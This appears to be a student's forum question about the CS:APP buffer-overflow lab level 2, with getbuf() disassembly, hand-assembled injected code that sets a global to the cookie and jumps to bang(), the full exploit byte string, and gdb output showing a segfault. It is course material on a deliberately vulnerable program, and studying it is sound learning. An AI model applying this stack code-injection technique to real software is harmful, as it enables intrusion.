I'm doing the csapp buflab level 2. In this assignment I'm asked to input an exploit string using the getbuf()
Mine looks like.
08048fe0 <getbuf>:
8048fe0: 55 push %ebp
8048fe1: 89 e5 mov %esp,%ebp
8048fe3: 83 ec 18 sub $0x18,%esp
8048fe6: 8d 45 f4 lea -0xc(%ebp),%eax
8048fe9: 89 04 24 mov %eax,(%esp)
8048fec: e8 6f fe ff ff call 8048e60 <Gets>
8048ff1: b8 01 00 00 00 mov $0x1,%eax
8048ff6: c9 leave
8048ff7: c3 ret
8048ff8: 90 nop
8048ff9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
And the bang() checks the global_value,
void bang(int val)
{
entry_check(2); /* Make sure entered this function properly */
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
}
So I find the address:
0804a1dc <global_value>:
804a1dc: 00 00 00 00
And my exploit string looks like:
00000000 <.text>:
0: c7 05 dc a1 04 08 6c movl $0x6355476c,0x804a1dc
7: 47 55 63
a: 68 60 8d 04 08 push $0x8048d60
f: c3 ret
Then I search the address of the input string(it should be on the stack)
Breakpoint 1, 0x08048fe6 in getbuf ()
(gdb) print /x ($ebp-0xc)
$1 = 0xffffb3ac
(gdb)
So my input string is c7 05 dc a1 04 08 6c 47 55 63 68 60 8d 04 08 c3 ac b3 ff ff
However, I still get the result of segmentation fault. The result shows that I entered the right address, and I successfully passed level 0&1 using same strategy, I don't understand where I did wrong...
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < fire_hex_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < fire_hex_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0xa1dc05c7
0xffffb3b0: 0x476c0804 0x60686355 0xc308048d 0xffffb3ac
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffffb3ac in ?? ()
(gdb)
This is the succussful version of level 0(where I was asked to simply overwrite the return address with another function's starting address), notice that the addresses are in the same place, but level 2 just failed.
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < smoke_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < smoke_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0x00000000
0xffffb3b0: 0x00000000 0x00000000 0x00000000 0x08048e20
0xffffb3c0: 0x00000000 0x08049ac7
(gdb) cont
Continuing.
Type string:Smoke!: You called smoke()
Thanks for any advice.